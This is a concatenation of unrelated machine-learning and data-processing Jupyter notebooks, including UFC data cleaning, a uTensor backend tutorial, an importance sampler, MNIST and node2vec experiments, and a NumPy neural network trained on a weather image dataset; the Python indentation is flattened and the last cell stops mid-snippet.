def fix_inconsistent_location(df):
city_patterns = [
(
df["event_location"].str.contains("Abu Dhabi", case=False),
"Abu Dhabi, United Arab Emirates",
),
(
df["event_location"].str.contains("Sao Paulo", case=False),
"Sao Paulo, Brazil",
),
(
df["event_location"].str.contains("Rio de Janeiro", case=False),
"Rio de Janeiro, Brazil",
),
(
df["event_location"].str.contains("Berlin", case=False),
"Berlin, Germany",
),
(
df["event_location"].str.contains("Saitama", case=False),
"Saitama, Japan",
),
]
city_criteria, city_values = zip(*city_patterns)
df["event_location_normalized"] = np.select(city_criteria, city_values, None)
# Replace "None" values with original position
df["event_location_normalized"] = df["event_location_normalized"].combine_first(
df["event_location"]
)
df["event_location"] = df["event_location_normalized"]
return df.drop(columns=["event_location_normalized"])
df_events = fix_inconsistent_location(df_events)
# ### Geocode cities to have latitude and longitude for event_location
#
# %%capture
# %run -i '../ufc_events_eda/data/geocode.py'
df_city = pd.read_parquet(path.data_interim_dir("cities.parquet"))
df_events_merged = pd.merge(
df_events, df_city, how="left", on="event_location"
).drop_duplicates(subset="event_name")
# ### Check null values
#
df_fights.isna().sum()
# We can see there are 3217 fights that do not have method_detail. Also, there are 21 fights that do not have strikes, knockdowns, takedowns and submissions data. Let's see if we should keep those fights in the dataset.
#
df_fights[df_fights["fighter_1_kd"].isna()]
# Although we have no data of what happened **during** those fights, there is data of how they ended, where they took place, etc. Therefore, I keep those 21 fights in the dataset.
#
# ### Save processed data to parquet files
#
df_events_merged.to_parquet(path.data_processed_dir("events_processed.parquet"))
df_fights.to_parquet(path.data_processed_dir("fights_processed.parquet"))
| notebooks/1-cvillafraz-data-processing.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# Required: pip install neatdata
from neatdata.neatdata import *
import pandas as pd  # pandas is used directly below; don't rely on the star import above
df = pd.read_csv("train.csv") # Edit: Your dataset
from sklearn.model_selection import train_test_split
className = 'class' # Edit: Replace class with the Y column name
trainX, testX, trainY, testY = train_test_split(df.drop([className], axis=1),
df[className], train_size=0.75, test_size=0.25)
indexColumns = [] # Edit: Optionally add column names
# Automatic data cleaning will ignore the following columns:
iWillManuallyCleanColumns = [] # Edit: Optionally add column names.
# neatdata API:
neatdata = NeatData()
cleanTrainX, cleanTrainY = neatdata.cleanTrainingDataset(trainX, trainY, indexColumns, iWillManuallyCleanColumns)
cleanTestX = neatdata.cleanTestDataset(testX)
# If Y is a string, this command makes them numeric:
cleanTestY = neatdata.convertYToNumbersForModeling(testY)
# This will convert Y values back to strings if necessary
# results = neatData.convertYToStringsOrNumbersForPresentation(self.results)
| Hello Neatdata.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: utensor
# language: python
# name: utensor
# ---
# ## Write a Simple Backend
#
# 1. All backend should overwrite:
# - a class attribute `TARGET`: this is the target name of your backend
# - `default_config` class property
# - `apply` method, which is responsible for generating files or anything you want with the given `ugraph`
# ### The `Backend` interface
#
# 1. the class attribute `TARGET` should be overwriten and be of type `str`.
# - the value of `TARGET` should be unique or `ValueError` will be raised
# 2. one should overwrite the `default_config` class property
# 3. the first argument of `__init__` should be the config dictionary
# - this dictionary can be generated via a toml file (recommended)
# - this dictionary should be of the same format as the value returned by `default_config` class property
#
# Here is a simple example:
# +
from utensor_cgen.backend import Backend
from utensor_cgen.utils import class_property
class DummyBackend(Backend):
TARGET = 'dummy-backend'
    def __init__(self, config):
        self.config = config  # store the config so the component lookup below works
        self.output_file = self.config[self.TARGET][self.COMPONENT]['output-file']
def apply(self, ugraph):
print('generating {}'.format(self.output_file), )
with open(self.output_file, 'w') as fid:
fid.write('#include <stdio.h>\n\n')
fid.write('int main(int argc, char* argv[]) {\n')
fid.write(' printf("graph name: {}\\n");\n'.format(ugraph.name))
fid.write(' printf("ops in topological sorted order:\\n");\n')
for op_name in ugraph.topo_order:
fid.write(' printf(" {}\\n");\n'.format(op_name))
fid.write(' return 0;\n}')
@class_property
def default_config(cls):
"""this default_config property will define the format of `config` value
passed to `__init__`
You should initialize your backend instance accordingly
"""
return {
cls.TARGET: {
cls.COMPONENT: {
'output-file': 'list_op.c'
}
}
}
# -
print(DummyBackend.TARGET, DummyBackend.COMPONENT)
# Basically, this dummy backend takes a graph and generate a `.c` file which will print out all the operators in the graph.
# ## Backend Registration
#
# Once you create a `Backend`, you can registrate it via `BackendManager` as following:
# +
from utensor_cgen.backend import BackendManager
BackendManager.register(DummyBackend)
# -
# ## Read a Graph and Apply the Backend
from utensor_cgen.frontend import FrontendSelector
ugraph = FrontendSelector.parse('models/cifar10_cnn.pb', output_nodes=['pred'])
BackendManager.get_backend(DummyBackend.TARGET)({
DummyBackend.TARGET: {
'backend': {
'output-file': 'list_mymodel_ops.cpp'
}
}
}).apply(ugraph)
# !cat list_mymodel_ops.cpp
#
| tutorials/component_registration/backend_registration.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: achint-env2
# language: python
# name: achint-env2
# ---
import torch
import numpy as np
_device = 'cuda' if torch.cuda.is_available() else 'cpu'
from scipy.stats import multivariate_normal as mv
import matplotlib.pyplot as plt
# +
# n_IW_samples =10
# m1 = 2
# m2 = 5
# var=5
# x,y= sample_proposal(m1, m2, var, n_IW_samples)
# +
# x = torch.ones(64,32)
# y = torch.ones(10,32)
# (x @ y.T).size()
# +
## Input G , mu1, var1, mu2, var2
## Output: z,W, KL
# -
class importance_sampler():
def __init__(self, latent_dim1, latent_dim2, batch_size):
self.latent_dim1 = latent_dim1
self.latent_dim2 = latent_dim2
self.batch_size = batch_size
def sample_proposal(self,var, n_IW_samples, device=_device):
mn1 = torch.distributions.MultivariateNormal(torch.zeros(self.latent_dim1), var * torch.eye(self.latent_dim1))
mn2 = torch.distributions.MultivariateNormal(torch.zeros(self.latent_dim2), var * torch.eye(self.latent_dim2))
return [mn1.sample([n_IW_samples,self.batch_size]).to(device), mn2.sample([n_IW_samples,self.batch_size]).to(device)]
def proposal_dist(self,z1,z2,proposal_var):
# dim = self.latent_dim1+self.latent_dim2
z_sqd = -(z1**2).sum(-1)-(z2**2).sum(-1)
log_p_x = z_sqd/proposal_var
# p_x = 1/(2*np.pi*var)**(dim/2)*torch.exp(z_sqd/var)
return log_p_x
def target_dist(self,G,z1,z2,mu1,var1,mu2,var2):
# mu1: [batch_size,latent_dim1], z1: [n_IW_samples,latent_dim1]
g11 = G[:self.latent_dim1,:self.latent_dim2] #[latent_dim1, latent_dim2]
g12 = G[:self.latent_dim1,self.latent_dim2:] #[latent_dim1, latent_dim2]
g21 = G[self.latent_dim1:,:self.latent_dim2] #[latent_dim1, latent_dim2]
g22 = G[self.latent_dim1:,self.latent_dim2:] #[latent_dim1, latent_dim2]
z_sqd = -(z1**2).sum(-1)-(z2**2).sum(-1) #[n_IW_samples,batch_size]
h1 = (z1@g11*z2).sum(-1)
h2 = (z1@g12*(z2**2)).sum(-1)
h3 = ((z1**2)@g21*z2).sum(-1)
h4 = ((z1**2)@g22*(z2**2)).sum(-1)
h = h1+h2+h3+h4 #[n_IW_samples, batch_size]
d1 = (mu1*z1+var1*(z1**2)).sum(-1)
d2 = (mu2*z2+var2*(z2**2)).sum(-1)
d = d1 + d2 #[n_IW_samples, batch_size]
log_t_x = (z_sqd+h+d) #[n_IW_samples, batch_size]
return log_t_x
def calc(self,G,mu1,var1,mu2,var2,n_IW_samples):
proposal_var = 1
z1_prior, z2_prior = self.sample_proposal(proposal_var,n_IW_samples) #[n_IW_samples,batch_size,latent_dim1],[n_IW_samples,batch_size,latent_dim2]
print(z1_prior.size())
z1_posterior,z2_posterior = self.sample_proposal(proposal_var,n_IW_samples)#[n_IW_samples,batch_size,latent_dim1],[n_IW_samples,batch_size,latent_dim2]
t_x_prior = self.target_dist(G,z1_prior, z2_prior,torch.zeros_like(mu1),torch.zeros_like(var1),torch.zeros_like(mu2),torch.zeros_like(var2))
t_x_post = self.target_dist(G,z1_posterior, z2_posterior,mu1,var1,mu2,var2)
p_x_prior = self.proposal_dist(z1_prior,z2_prior,proposal_var)
p_x_post = self.proposal_dist(z1_posterior,z2_posterior,proposal_var) #[batch_size,n_IW_samples]
IS_weights_prior = t_x_prior - p_x_prior
prior_normalization = (torch.logsumexp(IS_weights_prior,1)).unsqueeze(1)
IS_weights_prior = torch.exp(IS_weights_prior - prior_normalization)
IS_weights_post = t_x_post - p_x_post
posterior_normalization = (torch.logsumexp(IS_weights_post,1)).unsqueeze(1)
IS_weights_post = torch.exp(IS_weights_post - posterior_normalization)
return z1_prior,z2_prior,z1_posterior,z2_posterior, IS_weights_prior,IS_weights_post
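# `calc` above forms self-normalized importance weights by subtracting a logsumexp
# normalizer in log space. A minimal NumPy sketch of the same idea on a 1-D toy problem
# (illustrative only — a Gaussian target known up to a constant, with a wider Gaussian
# proposal):

```python
import numpy as np

rng = np.random.default_rng(0)
n = 200_000

# Proposal q = N(0, 2^2); target t = N(1, 1), known only up to a constant.
z = rng.normal(0.0, 2.0, size=n)
log_q = -0.5 * (z / 2.0) ** 2          # proposal log-density (constants drop out)
log_t = -0.5 * (z - 1.0) ** 2          # unnormalized target log-density

# Self-normalized weights, stabilized in log space as calc() does with logsumexp.
log_w = log_t - log_q
log_w -= log_w.max()
w = np.exp(log_w)
w /= w.sum()

est_mean = np.sum(w * z)               # should approach the target mean of 1
print(est_mean)
```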
# +
# x = torch.randn(15)
# x = x.repeat(10, 1)
# x.size()
# -
| 2D_2D_Gaussian_with_IS/importance_sampler_poise.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import tensorflow as tf
import tensorflow.examples.tutorials.mnist.input_data as inputData
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import confusion_matrix
data = inputData.read_data_sets('data', one_hot=True)
def plotNumbers(imset, valset, dimen):
fig, axis = plt.subplots(dimen[0],dimen[1])
for pos, sub in enumerate(axis.flat):
sub.imshow(imset[pos].reshape((28,28)))
sub.set_xticks([])
sub.set_yticks([])
sub.set_xlabel('pred:%r' %valset[pos])
plt.show()
# +
num_of_epochs=400
batch_size = 100
accu_list = []
epoch_size = int(len(data.train.labels)/batch_size)
#L1:200, L2:100, L3:60, L4:30, L5:10
X = tf.placeholder(tf.float32, shape=[None, 784])
Y_ori = tf.placeholder(tf.float32, shape=[None, 10])
W1 = tf.Variable(initial_value=tf.truncated_normal([784, 200], stddev=0.1))
W2 = tf.Variable(initial_value=tf.truncated_normal([200, 100], stddev=0.1))
W3 = tf.Variable(initial_value=tf.truncated_normal([100, 60], stddev=0.1))
W4 = tf.Variable(initial_value=tf.truncated_normal([60, 30], stddev=0.1))
W5 = tf.Variable(initial_value=tf.truncated_normal([30, 10], stddev=0.1))
b1 = tf.Variable(initial_value=tf.zeros(200))
b2 = tf.Variable(initial_value=tf.zeros(100))
b3 = tf.Variable(initial_value=tf.zeros(60))
b4 = tf.Variable(initial_value=tf.zeros(30))
b5 = tf.Variable(initial_value=tf.zeros(10))
af1 = tf.matmul(X, W1) + b1
Y1 = tf.nn.sigmoid(af1)
af2 = tf.matmul(Y1, W2) + b2
Y2 = tf.nn.sigmoid(af2)
af3 = tf.matmul(Y2, W3) + b3
Y3 = tf.nn.sigmoid(af3)
af4 = tf.matmul(Y3, W4) + b4
Y4 = tf.nn.sigmoid(af4)
af5 = tf.matmul(Y4, W5) + b5
Y_pred = tf.nn.softmax(af5)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=af5, labels=Y_ori)
cost = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(0.009)
trainer = optimizer.minimize(cost)
correct_prediction = tf.equal(tf.argmax(Y_ori, axis=1), tf.argmax(Y_pred, axis=1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for val in range(epoch_size*num_of_epochs):
train_batch_x, train_batch_y = data.train.next_batch(batch_size)
sess.run(trainer, feed_dict={X: train_batch_x, Y_ori: train_batch_y})
if (val/epoch_size)%5==0:
accu_list.append(sess.run(accuracy, feed_dict={X: data.test.images, Y_ori: data.test.labels}))
print(accu_list)
# -
xVal = np.arange(10,num_of_epochs+5,5)
plt.plot(xVal, accu_list[1:])
plt.show()
# +
prediction = tf.argmax(Y_pred, axis=1)
predict_bool = sess.run(correct_prediction, feed_dict={X: data.test.images, Y_ori: data.test.labels})
predict_bool_inv = [not val for val in predict_bool]
failed_images = data.test.images[predict_bool_inv]
failed_pred = sess.run(prediction, feed_dict={X:failed_images})
plotNumbers(failed_images[200:218], failed_pred[200:218], dimen=(3,6))
len(failed_images)
# +
successful_images = data.test.images[predict_bool]
successful_pred = sess.run(prediction, feed_dict={X:successful_images})
plotNumbers(successful_images[0:18], successful_pred[0:18], dimen=(3,6))
# +
test_pred = sess.run(prediction, feed_dict={X: data.test.images})
test_true = data.test.labels.argmax(axis=1)
confu_matri = confusion_matrix(test_true, test_pred)
print(confu_matri)
# +
#assign weight with truncated_normal()
# AdamOptimizer instead of GradientDescentOptimizer
# +
#epoch: 75
[0.0892, 0.9673, 0.9761, 0.9753, 0.9749, 0.9776, 0.9779, 0.9756, 0.973, 0.9753, 0.9769, 0.975, 0.976, 0.9751, 0.9743]
#epoch: 20, without *100
[0.1032, 0.9706, 0.9727, 0.9757]
#with gradient descent
[0.1028, 0.1135, 0.1135, 0.1135]
#wtih weights initialized as zero
[0.0958, 0.2801, 0.3346, 0.3598]
| 2.tensor_mnist_five_layer_sigmoid.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.6.10 64-bit (''site_similarity'': conda)'
# name: python361064bitsitesimilarityconda5cc228f1d50144ce9681545e76d7f6e7
# ---
import sys,os
sys.path.append("/home/paco/Documents/site_similarity")
from utils.notebook_utils import load_level_data, create_nodes, create_graph, draw_graph
# + tags=[]
lvl_one = load_level_data(level=1)
# -
lvl_one_nodes = create_nodes(lvl_one)
lvl_one_nodes[:10]
[(k, v) for k, v in lvl_one_nodes if k == 'politicalmayhem.news']
# +
from stellargraph import StellarGraph
import pandas as pd
lvl_one_graph = StellarGraph(edges=pd.DataFrame(lvl_one_nodes, columns=['source', 'target']))
# + tags=[]
from stellargraph.data import BiasedRandomWalk
rw = BiasedRandomWalk(lvl_one_graph)
walks = rw.run(
nodes=list(lvl_one_graph.nodes()), # root nodes
length=100, # maximum length of a random walk
n=10, # number of random walks per root node
p=0.5, # Defines (unormalised) probability, 1/p, of returning to source node
q=2.0, # Defines (unormalised) probability, 1/q, for moving away from source node
)
print("Number of random walks: {}".format(len(walks)))
# +
from gensim.models import Word2Vec
str_walks = [[str(n) for n in walk] for walk in walks]
model = Word2Vec(str_walks, size=128, window=5, min_count=0, sg=1, workers=2, iter=1)
model.save("node2vec_lvl_one_new_data.model")
# -
model.wv['villagevoice.com'].shape
# + tags=[]
from dataprep.load_annotated_data import apply_splits
from utils.notebook_utils import load_corpus
from modelling.baselines import eval_model
DATA = load_corpus('modified_corpus.csv')
SPLITS = apply_splits(DATA)
print(SPLITS.keys())
train = pd.DataFrame(SPLITS['train-0'])
test = pd.DataFrame(SPLITS['test-0'])
# +
X_train = train.apply(lambda x: model.wv[x['source_url_processed']], axis=1)
y_train = train.apply(lambda x: x['fact'], axis=1)
# +
X_test = test.apply(lambda x: model.wv[x['source_url_processed']], axis=1)
y_test = test.apply(lambda x: x['fact'], axis=1)
# + tags=[]
from sklearn.linear_model import LogisticRegressionCV
from sklearn.metrics import accuracy_score
clf = LogisticRegressionCV(
Cs=10, cv=10, scoring="accuracy", verbose=True, multi_class="ovr", max_iter=300
)
clf.fit(X_train.values.tolist(), y_train.values.tolist())
# +
y_pred = clf.predict(X_test.values.tolist())
accuracy_score(y_test, y_pred)
# +
from sklearn.ensemble import GradientBoostingClassifier
clf = GradientBoostingClassifier(random_state=42)
# -
clf.fit(X_train.tolist(), y_train.tolist())
tree_predict = clf.predict(X_test.tolist())
accuracy_score(y_test, tree_predict)
# +
from sklearn import svm
svm_clf = svm.SVC(decision_function_shape='ovo')
svm_clf.fit(X_train.tolist(), y_train.tolist())
# -
svm_predict = svm_clf.predict(X_test.tolist())
accuracy_score(y_test, svm_predict)
lin_clf = svm.LinearSVC() # one-vs-rest
lin_clf.fit(X_train.tolist(), y_train.tolist())
lin_predict = lin_clf.predict(X_test.tolist())
accuracy_score(y_test, lin_predict)
| notebooks/audience_overlap_node2vec_models/old_notebooks_with_older_way_of_eval/new_data_tester unweighted.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/swap-10/Dense-DNN-From-Scratch/blob/main/DenseDNNScratch.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="sx-MqOmAqjMR"
# # Fully Connected Deep Neural Network with NumPy
# + [markdown] id="PT-veG8Jqsyn"
# # Constructing the Neural Net
# + id="qJ6XSCYxCsL0"
import numpy as np
import matplotlib.pyplot as plt
import h5py
import scipy
import sys
import glob
import h5py
import cv2
import csv
np.random.seed()
# + id="w7p3oYdqHEb4"
def sigmoid(Z):
    s = 1 / (1 + np.exp(-Z))
    cache_act = Z
    return s, cache_act
def sigmoid_derivative(Z):
    # cache_act stores the pre-activation Z, so the derivative must be
    # sigmoid(Z) * (1 - sigmoid(Z)), not Z * (1 - Z)
    s, _ = sigmoid(Z)
    return np.multiply(s, (1 - s))
def sigmoid_backprop(dA, cache_act):
Z = cache_act
dZ = np.multiply(dA, sigmoid_derivative(Z))
return dZ
def relu(Z):
r = np.maximum(0, Z)
cache_act = Z
return r, cache_act
def relu_derivative(Z):
d_relu = Z
d_relu[d_relu<=0] = 0
d_relu[d_relu>0] = 1
return d_relu
def relu_backprop(dA, cache_act):
Z = cache_act
dZ = np.multiply(dA, relu_derivative(Z))
return dZ
def softmax(Z):
cache_act = Z
s = np.exp(Z) / (np.sum(np.exp(Z), axis=0))
return s, cache_act
# + colab={"base_uri": "https://localhost:8080/"} id="bcF-BUFAPiWy" outputId="aa192c8d-6511-4cbb-927e-ac60533e0543"
a = [[1, 2],
[3, 4],
[5, 6]]
b = [[11, 12],
[13, 14],
[15, 16]]
print(np.multiply(a,b))
# + id="mpiMcZp1ELmW"
def init_params(layer_dims):
params = {}
L = len(layer_dims)
for i in range(1, L):
params[f"W%d" %i] = (np.random.randn(layer_dims[i], layer_dims[i-1]) + (1e-9)) * 0.03
params[f"b%d" %i] = np.zeros((layer_dims[i],1))
return params
# + id="q50TbswZFqZ0"
def forward_nonact(A, W, b):
Z = np.dot(W, A) + b
cache = (A, W, b)
return Z, cache
def forward_act(A_pre, W, b, activation):
if activation == "sigmoid":
Z, cache_nonact = forward_nonact(A_pre, W, b)
A, cache_act = sigmoid(Z)
elif activation == "softmax":
Z, cache_nonact = forward_nonact(A_pre, W, b)
A, cache_act = softmax(Z)
elif activation == "relu":
Z, cache_nonact = forward_nonact(A_pre, W, b)
A, cache_act = relu(Z)
cache = (cache_nonact, cache_act)
return A, cache
# + id="5fQMd2T5IRg0"
def forward_prop(X, params):
L = len(params) // 2
cache_accumulate = []
A = X # First layer
for i in range(1, L):
A_pre = A
A, cache = forward_act(
A_pre,
params[f"W%d" %i], params[f"b%d" %i],
activation="relu"
)
cache_accumulate.append(cache)
A_L, cache = forward_act(
A,
params[f"W%d" %L],
params[f"b%d" %L],
activation="softmax"
)
cache_accumulate.append(cache)
return A_L, cache_accumulate
# + id="WPgbEF2eKReg"
def compute_cost(A_L, Y):
m = Y.shape[1] # Assuming Y is in form of (1, num_of_training_examples)
cost = (-1/m) * np.sum(np.multiply(Y, np.log(A_L)), axis=1, keepdims=True) # Softmax cost
cost = np.sum(cost)
cost = np.squeeze(cost)
return cost
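# A quick numeric check of the cost formula above on a tiny hand-made batch (values
# chosen by hand, not from the real dataset): a uniform prediction over 10 classes
# costs log(10), and a nearly-perfect one-hot prediction costs almost 0.

```python
import numpy as np

# Self-contained copy of compute_cost for checking (same formula as above).
def softmax_cost(A_L, Y):
    m = Y.shape[1]
    cost = (-1 / m) * np.sum(np.multiply(Y, np.log(A_L)), axis=1, keepdims=True)
    return np.squeeze(np.sum(cost))

# 10 classes, 2 examples, labels one-hot along columns.
Y = np.zeros((10, 2))
Y[3, 0] = 1
Y[7, 1] = 1

uniform = np.full((10, 2), 0.1)              # maximally uncertain prediction
cost_uniform = softmax_cost(uniform, Y)      # log(10) ~= 2.3026

confident = np.full((10, 2), 1e-8)
confident[3, 0] = 1 - 9e-8                   # nearly-perfect prediction
confident[7, 1] = 1 - 9e-8
cost_confident = softmax_cost(confident, Y)  # ~= 0

print(cost_uniform, cost_confident)
```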
# + id="gZW8MRMxLsci"
def backward_nonact(dZ, cache_nonact):
A_pre, W, b = cache_nonact
m = A_pre.shape[1] # All A.shape[1] will have same value (m)
dW = (1/m) * np.dot(dZ, A_pre.T)
db = (1/m) * np.sum(dZ, axis=1, keepdims=True)
dA_pre = np.dot(W.T, dZ)
return dA_pre, dW, db
def backward_act(dA, cache, activation):
cache_nonact, cache_act = cache
if activation == "relu":
dZ = relu_backprop(dA, cache_act)
dA_pre, dW, db = backward_nonact(dZ, cache_nonact)
elif activation == "sigmoid":
dZ = sigmoid_backprop(dA, cache_act)
dA_pre, dW, db = backward_nonact(dZ, cache_nonact)
    # Softmax is only used in the final layer, and its required derivative (the derivative of the loss w.r.t. Z) is much easier and more convenient to compute directly
    # For this reason it is computed separately at the beginning of the backward propagation step and not here
return dA_pre, dW, db
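The shortcut `dZ = A_L - Y` used at the start of `backward_prop` below follows from a short derivation (softmax activation with cross-entropy loss and one-hot labels):

```latex
% softmax: a_k = e^{z_k} / \sum_j e^{z_j};  loss: L = -\sum_k y_k \log a_k
\frac{\partial L}{\partial z_k}
  = \sum_j \frac{\partial L}{\partial a_j}\,\frac{\partial a_j}{\partial z_k}
  = \sum_j \left(-\frac{y_j}{a_j}\right) a_j\,(\delta_{jk} - a_k)
  = a_k \sum_j y_j - y_k
  = a_k - y_k
```

Vectorized over classes and examples (and using that a one-hot column sums to 1), this is exactly `dZ = A_L - Y`.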
# + id="-2PXQlnIupJl"
def backward_prop(A_L, Y, cache_accumulate):
L = len(cache_accumulate)
m = A_L.shape[1]
Y = Y.reshape(A_L.shape)
grads = {}
    dA_L = - (np.divide(Y, A_L))  # derivative of the loss w.r.t. the activated output (not used directly; the softmax shortcut below folds it in)
cache_cur = cache_accumulate[-1]
dZ = A_L - Y # This combined with the next line gives the backward_act() for the last layer (softmax)
dA_pre_cur, dW_cur, db_cur = backward_nonact(dZ, cache_cur[0]) # cache_cur[0] is cache_nonact.
    grads[f"dA{L-1}"] = dA_pre_cur
    grads[f"dW{L}"] = dW_cur
    grads[f"db{L}"] = db_cur
for i in range(L-2, -1, -1):
cache_cur = cache_accumulate[i]
dA_pre_cur, dW_cur, db_cur = backward_act(dA_pre_cur, cache_cur, activation="relu")
        grads[f"dA{i}"] = dA_pre_cur
        grads[f"dW{i+1}"] = dW_cur
        grads[f"db{i+1}"] = db_cur
return grads
# + id="v76TCDib0beA"
def update_params(params, grads, learning_rate):
parameters = params.copy()
L = len(parameters) // 2
for i in range(L):
        parameters[f"W{i+1}"] = parameters[f"W{i+1}"] - (learning_rate * grads[f"dW{i+1}"])
        parameters[f"b{i+1}"] = parameters[f"b{i+1}"] - (learning_rate * grads[f"db{i+1}"])
return parameters
# + [markdown] id="b_fS0Nw91sqc"
#
#
# ---
# ---
# ---
# + [markdown] id="JcRbMBO91ybV"
# <br>
# <br>
# <br>
# <br>
# + [markdown] id="AGYMzjW6rFU3"
# [Dataset used](https://data.mendeley.com/datasets/4drtyfjtfy/1)
# + [markdown] id="0SOt0bGzq8OI"
# # Using the Neural Net
# + [markdown] id="G_8tB7HNrCSh"
# # Data Preparation
# + [markdown] id="wYn6vSFgrEnk"
# <h2> Careful! </h2>
# + id="4hbgSBXO43IV" language="bash"
# rm -rf downloaddata
# rm -rf dataset2
# + id="fZnTy2iI2COs" colab={"base_uri": "https://localhost:8080/"} outputId="4ce42be6-fd86-4399-d34e-c94a3f43d912" language="bash"
# mkdir downloaddata
# wget -O ./downloaddata/images.zip https://data.mendeley.com/public-files/datasets/4drtyfjtfy/files/a03e6097-f7fb-4e1a-9c6a-8923c6a0d3e0/file_downloaded | head
# unzip ./downloaddata/images.zip -d ./downloaddata
# + id="OlI6hBLWSB85" language="bash"
# touch filenames.txt
# ls ./downloaddata/dataset2/ > filenames.txt
# + id="gZ_1her5HutL" language="bash"
# a=1
# for i in ./downloaddata/dataset2/cloudy*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/cloudy%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# a=1
# for i in ./downloaddata/dataset2/rain*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/rain%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# a=1
# for i in ./downloaddata/dataset2/shine*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/shine%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# a=1
# for i in ./downloaddata/dataset2/sunrise*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/sunrise%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# + id="r36V1XW9czSt" language="bash"
# touch filenames.csv
# cd downloaddata/dataset2/
# printf "%s\n" * > ../../filenames.csv
# cd ../../
# shuf filenames.csv > filenames_shuf.csv
# head -n 901 filenames_shuf.csv > train_names.csv
# tail -n 225 filenames_shuf.csv > test_names.csv
# + [markdown] id="9GryzbWjmMRH"
# csv files containing names of shuffled data -- done
# + colab={"base_uri": "https://localhost:8080/"} id="wMEf524o8yc3" outputId="32b77f50-15fb-4f69-d2fc-3f7bd85085bf"
import csv   # needed by csv.reader below (add if not already imported earlier in the notebook)
import cv2   # needed by cv2.imread / cv2.resize below
import h5py  # needed by h5py.File below

IMG_WIDTH = 128
IMG_HEIGHT = 128
hf = 'import_images.h5'
with open('train_names.csv', newline='\n') as f:
reader = csv.reader(f)
data = list(reader)
print(data[:100])
nfiles = len(data)
print(f'count of image files nfiles={nfiles}')
data = enumerate(data)
# resize all images and load into a single dataset
with h5py.File(hf,'w') as h5f:
img_ds = h5f.create_dataset('images_train',shape=(nfiles, IMG_WIDTH, IMG_HEIGHT,3), dtype=int)
img_labels = h5f.create_dataset('labels_train', shape=(nfiles, 1), dtype=int)
for (cnt, ifile) in data:
ifile = "./downloaddata/dataset2/" + ifile[0]
img = cv2.imread(ifile, cv2.IMREAD_COLOR)
if img is None:
continue
img_resize = cv2.resize( img, (IMG_WIDTH, IMG_HEIGHT))
        img_ds[cnt] = img_resize
if "cloudy" in str(ifile):
classnum = 0
elif "rain" in str(ifile):
classnum = 1
elif "shine" in str(ifile):
classnum = 2
elif "sunrise" in str(ifile):
classnum = 3
img_labels[cnt, :] = classnum
classnames = ["cloudy", "rain", "shine", "sunrise"]
# + colab={"base_uri": "https://localhost:8080/", "height": 475} id="1rJ7sp1kJEYr" outputId="a84307f5-b8dd-4623-e55a-6228ced5715b"
hfile = h5py.File(hf, 'r')
n = hfile.get('images_train')
l = hfile.get('labels_train')
print(type(n))
plt.figure(figsize=(10,10))
for i, img in enumerate(n[:10,:,:,:]):
plt.subplot(2,5,i+1)
plt.title(classnames[np.squeeze(l[i,:])])
plt.imshow(img)
hfile.close()
# + colab={"base_uri": "https://localhost:8080/"} id="oJXgvEz9rhoo" outputId="a9592ffc-1efe-4882-b165-220f31b20337"
# https://stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python
hfile.close()
hfile = h5py.File(hf, 'r')
i=0
for key in hfile.keys():
print(key)
group1 = hfile['images_train']
train_images = group1[:]
train_images = np.array(train_images)
print(type(train_images))
print(train_images.shape)
train_images = train_images.reshape(IMG_WIDTH*IMG_HEIGHT*3, -1)
print(train_images.shape)
print(train_images)
group2 = hfile['labels_train']
train_labels = group2[:]
train_labels = np.array(train_labels)
print(type(train_labels))
print(train_labels.shape)
train_labels = train_labels.reshape(1, -1)  # one row, one entry per training example
print(train_labels.shape)
print(train_labels)
hfile.close()
# + colab={"base_uri": "https://localhost:8080/"} id="ouvp-yNO52-8" outputId="9367a9a1-0cc5-4c0f-9327-6d26cb66a9bb"
layer_dims = [49152, 50, 20, 5, 4]
train_labels = np.multiply(train_labels, np.ones((4, train_labels.shape[1])))
print(train_labels.shape)
print(type(train_labels))
print(train_labels)
# + colab={"base_uri": "https://localhost:8080/"} id="UN9I76skFaLJ" outputId="9b3d847b-b27d-4540-9270-be3cb7b5ed8c"
for i in range(train_labels.shape[0]):
train_labels[i] = [(i==val) for val in train_labels[i]]
print(train_labels.shape)
print(train_labels[0])
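The label-to-one-hot trick used in the two cells above can be checked on a tiny made-up array:

```python
import numpy as np

labels = np.array([[0, 2, 1]])  # class index for each of 3 examples
# broadcast the row of indices down to one identical row per class...
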